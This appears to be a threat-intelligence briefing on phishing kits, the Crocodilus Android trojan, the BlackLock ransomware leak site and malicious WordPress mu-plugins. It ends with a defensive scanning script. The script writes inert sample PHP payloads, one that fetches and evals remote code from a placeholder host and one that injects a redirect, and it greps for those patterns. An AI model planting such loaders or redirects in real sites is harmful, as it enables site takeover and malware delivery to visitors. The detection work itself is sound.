Malware Activity
The Growing Threat of Evolving Malware and Phishing Tactics
The digital landscape is seeing an alarming rise in sophisticated phishing and malware tactics. Most recently, advanced phishing kits dubbed "Morphing Meerkat" have emerged that cleverly exploit vulnerabilities in DNS MX records. These kits not only shift their appearance dynamically to dodge detection, which greatly complicates cybersecurity efforts, but also reflect a broader trend of phishing-as-a-service (PhaaS) operations using DNS over HTTPS (DoH) to obfuscate their activity and undermine traditional security controls. Simultaneously, a more targeted threat has emerged in the form of Crocodilus, a malware strain that primarily preys on Android users by masquerading as legitimate applications to extract sensitive cryptocurrency wallet keys and manipulate device functionality through over 200 apps, particularly from third-party sources. This Trojan can usurp control of devices, intercept SMS messages, and even display overlays on authentic banking applications, deceiving users into divulging their financial credentials. At the same time, a resurgence of malware exploiting critical vulnerabilities, such as those found in Ivanti's Endpoint Manager, raises alarms as hackers deploy malicious payloads to compromised systems, subsequently fueling a rise in ransomware attacks. Compounding these threats is the growing tendency among cybercriminals to write malware in obscure programming languages, a tactic that makes detection and analysis increasingly difficult for cybersecurity professionals and lets fraudsters hide their malicious intent more effectively amid a landscape filled with outdated or unpatched software. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- SecurityAffairs: Morphing Meerkat Phishing Kits article
- BleepingComputer: Phishing-as-a-Service Operation Uses DNS over HTTPS article
- BleepingComputer: New Crocodilus Malware Steals Android Users Crypto Wallet Keys article
- TheHackerNews: New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials article
- SecurityWeek: Crocodilus Android Banking Trojan article
- TheHackerNews: RESURGE Malware Exploits Ivanti Flaw article
- TheRegister: Malware Using Obscure Languages article
Threat Actor Activity
Researchers Exploit Vulnerability in BlackLock Ransomware Leak Site
In an instance of "hacking the hackers," threat hunters have infiltrated the infrastructure of the BlackLock ransomware group, uncovering significant insights into their operations. Researchers identified a security vulnerability in BlackLock's data leak site (DLS), enabling the extraction of configuration files, credentials, and command histories. The flaw involved a misconfiguration that exposed clearnet IP addresses related to the group's network behind TOR hidden services, marking a substantial operational security failure. BlackLock, a rebranded version of the Eldorado ransomware group, has become one of the most active extortion syndicates in 2025, targeting sectors such as technology, manufacturing, finance, and retail. As of last month, forty-six (46) victims from diverse countries including Argentina, Brazil, the United States, and others were listed on its site. The group also launched an underground affiliate network in January 2025, recruiting "traffers" to direct victims to malware-deploying pages for initial system access. The vulnerability identified by researchers is a local file inclusion (LFI) bug, which allowed a path traversal attack leading to sensitive information leakage. Notable findings include the use of Rclone to exfiltrate data to the MEGA cloud storage service, and the creation of multiple MEGA accounts using disposable email addresses for storing victim data. Reverse engineering revealed similarities between BlackLock and another ransomware strain, DragonForce, although they differ in code language (BlackLock uses Go while DragonForce uses Visual C++). Intriguingly, BlackLock's DLS was defaced by DragonForce on March 20, likely exploiting the same LFI vulnerability, with configuration files and internal chats leaked. This followed the defacement of Mamona ransomware's DLS a day prior.
Researchers speculate that BlackLock may have cooperated with DragonForce or transitioned ownership due to market consolidation, potentially compromising previous operations.
Vulnerabilities
WordPress MU-Plugin Directory Exploited to Inject Malicious Code
Hackers are increasingly exploiting the WordPress "mu-plugins" (Must-Use Plugins) directory to conceal and execute malicious code, allowing for persistent remote access and undetected attacks across all site pages. These plugins, which run automatically without being activated through the administrative dashboard and are hidden from the standard plugin interface, make an ideal target for threat actors. Security researchers have identified three (3) main malicious payloads being deployed in this directory. The first redirects users (excluding bots and admins) to a fake browser update page to install malware; the second acts as a webshell that remotely executes PHP code fetched from GitHub; and the third injects JavaScript to replace site images with explicit content and hijack outbound links for spam and scams. These attacks degrade site reputation, damage SEO rankings, and can lead to data theft or further exploitation. Additionally, compromised WordPress sites are being used to deploy malicious JavaScript, redirecting users or stealing financial data through checkout page skimmers. The precise method of infection remains uncertain but likely involves vulnerable plugins or themes, weak admin credentials, and server misconfigurations. Researchers have also noted the exploitation of several high-severity WordPress plugin vulnerabilities in 2024, emphasizing the urgent need for regular updates, code audits, strong passwords, multi-factor authentication, and deployment of web application firewalls to mitigate these evolving threats. CTIX analysts recommend that site administrators make a habit of staying up to date with the latest WordPress plugin exploits and always be on the lookout for security patches as they are released.
- The Hacker News: WordPress MU-Plugin Exploitation Article
- Bleeping Computer: WordPress MU-Plugin Exploitation Article
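Because mu-plugins never appear in the dashboard's plugin list, the practical defensive check is to inventory the directory on disk and flag files whose contents match the payload shapes described above (remote PHP fetch and eval, encoded payloads, client-side redirects). The following shell script is an added example, not code from the briefing or the cited articles; the sample mu-plugins directory, its three files, and the placeholder URLs in them are constructed here for illustration.

```shell
#!/bin/sh
# Constructed sample: a stand-in for wp-content/mu-plugins with one benign
# must-use plugin and two files shaped like the payloads the briefing describes.
MU_DIR="$(mktemp -d)/mu-plugins"
mkdir -p "$MU_DIR"

cat > "$MU_DIR/site-tweaks.php" <<'EOF'
<?php
// Benign must-use plugin: hides the admin bar for logged-in users.
add_filter('show_admin_bar', '__return_false');
EOF

cat > "$MU_DIR/index.php" <<'EOF'
<?php
// Constructed, inert sample shaped like a loader that fetches and runs remote PHP.
$src = file_get_contents('https://raw.githubusercontent.com/PLACEHOLDER/x.txt');
eval($src);
EOF

cat > "$MU_DIR/custom-js.php" <<'EOF'
<?php
// Constructed, inert sample shaped like an injector that redirects non-admin visitors.
if (!current_user_can('administrator')) {
    echo '<script>window.location="https://PLACEHOLDER.example/update";</script>';
}
EOF

# Inventory: every file in mu-plugins runs on every request, so each one
# should be accounted for (owner, size, modification time).
list_mu_plugins() {
  ls -la "$1"
}

# Flag files containing indicators tied to the three payload types:
# eval/base64 (webshell), remote fetch from GitHub (loader), JS redirect/injection.
scan_mu_plugins() {
  grep -lE 'eval\(|base64_decode\(|file_get_contents\(.https?://|raw\.githubusercontent\.com|window\.location|wp_redirect\(' \
    "$1"/*.php 2>/dev/null
}

# Count of flagged files, convenient for alerting thresholds (expected 0 on a clean site).
count_flagged() {
  scan_mu_plugins "$1" | grep -c .
}

list_mu_plugins "$MU_DIR"
echo "Flagged files:"
scan_mu_plugins "$MU_DIR"
```

Run the same two functions against the real `wp-content/mu-plugins` path on a server; any hit, or any file the site owner cannot explain, warrants manual review of the full source rather than just the matched line.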

© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.